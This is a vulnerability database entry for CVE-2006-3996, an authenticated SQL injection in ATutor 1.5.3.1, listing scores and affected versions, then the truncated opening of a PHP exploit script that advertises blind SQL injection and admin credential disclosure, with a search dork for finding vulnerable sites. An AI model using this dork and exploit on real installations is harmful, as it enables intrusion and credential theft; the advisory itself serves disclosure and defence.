
CVE-2006-3996

Published: 05/08/2006 Updated: 17/10/2018
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in links/index.php in ATutor 1.5.3.1 and previous versions allows remote authenticated users to execute arbitrary SQL commands via the (1) desc or (2) asc parameters.

Affected Products

Vendor | Product | Versions
Adaptive Technology Resource Centre | Atutor | 1.5.3.1

Exploits

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ATutor <= 1531 'links' blind SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autisticiorg\n";
echo "site: retrogodaltervistaorg\n";
echo "dork, version specific: \"Web site engine's code is copyright\" \"2001-2006 ATutor\" \"About ATutor\"\n\n";
/* - works rega ...